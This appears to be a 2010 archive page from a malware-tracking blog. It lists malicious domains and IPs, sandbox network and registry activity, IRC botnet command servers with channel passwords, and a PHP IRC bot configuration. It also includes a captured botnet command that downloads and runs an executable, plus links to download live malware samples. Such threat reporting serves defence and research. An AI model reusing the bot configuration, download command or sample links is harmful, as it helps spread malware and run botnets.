Month: November 2010

securebillpayment1.com (fake antivirus)

securebillpayment1.com 88.208.221.204
sysupdatenbz.com 78.26.179.19
sysupdateyte.com 78.26.179.19
Download URLs
http://78.26.179.19/0004098213 (sysupdatenbz.com)
Outgoing connection to remote server: securebillpayment1.com TCP port 80
Outgoing connection to remote...

contentserver001.info

contentserver001.info contentserver001.info 188.95.159.128
www.google.com www.google.com 74.125.43.99
Opened listening TCP connection on port: 21968
Download URLs
http://188.95.159.128/forum/img/img_1582.jpg (contentserver001.info)
http://74.125.43.99/webhp (www.google.com)
Outgoing connection to remote server: contentserver001.info TCP port 80
Outgoing connection to remote server: www.google.com TCP port 80
Registry...

204.188.198.116 (PHP Bot)

var $config = array("server"=>"204.188.198.116",
                    "port"=>6667,
                    "pass"=>"p0015123", // server password
                    "prefix"=>"DosNet|",
                    "maxrand"=>8,
                    "chan"=>"#php#",
                    "key"=>"", // channel password
                    "modes"=>"+p",
                    "password"=>"p0015123", // bot password
                    "trigger"=>".",
                    "hostauth"=>"*" // * for any hostname
                    );

bnsettings.com (kbot)

Host Name IP Address
bnsettings.com bnsettings.com 91.212.124.35
Download URLs
http://91.218.229.143/ (91.218.229.143)
http://74.53.182.127/ (74.53.182.127)
http://74.53.28.130/ (74.53.28.130)
http://74.53.28.131/ (74.53.28.131)

14 mb malware files

Here you can download and analyse for yourself around 14 MB of exe files from different malware.
Download: http://0dc07835.thesegalleries.com
Download: http://3533e7ca.seriousfiles.com

213.46.47.24

DNS Lookup

bbg.moiservice.com

bbg.moiservice.com 74.117.174.82
i3ED6DA76.versanet.de 62.214.218.118
Opened listening TCP connection on port: 55907
Opened listening TCP connection on port: 113
C&C Server: 74.117.174.82:16667
Server Password:
Username: laMer
Nickname: XP|Ubd2
Channel: #lbl# (Password: lam)
Channeltopic: :
Username: icbx
Nickname: [DEU]XP-SP3[00]6455
Channel: #l# (Password: lam)
Channeltopic: :.asc asn445 50 3 120 -r -b -s
Registry Changes by all processes

us.unicatz.com

us.unicatz.com 74.117.174.82
C&C Server: 74.117.174.82:2010
Server Password:
Username: okcbisjs
Nickname: okcbisjs
Channel: #us# (Password: d0s)
Channeltopic: :
Now talking in #us#
Topic On: [ #us# ] [ .msn.addcontact wingate32.exe wingate32.zip wingate32.rar estas foto son toyo? estas foto son toyo? ]
Topic By: [ dgdg ]
(dgdg) .l huh
(dgdg) .down http://attacke.100free.com/inanaged.exe c:\inanaged.exe 1
Registry Changes

minerva.cdmon.org

minerva.cdmon.org 184.106.215.31
C&C Server: 184.106.215.31:6667
Server Password:
Username: DELL-D3E62F7E26
Nickname: {XPDEU503896}
Channel: ##key## (Password: moneylover)
Channeltopic: :
Registry Changes by all processes
Create or Open
Changes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “Windows Update” = C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\service.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Windows Services” = service.exe
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared “CUAS”
HKEY_CURRENT_USER\Keyboard Layout\Toggle “Language Hotkey”
HKEY_CURRENT_USER\Keyboard Layout\Toggle “Layout Hotkey”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF “EnableAnchorContext”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows...

bunker.org.ua

DNS Lookup
Outgoing connection to remote server: 208.110.80.34 TCP port 443
Outgoing connection to remote server: direct.ips.co.jp TCP port 443
Outgoing connection to remote server: loja.tray.com.br TCP...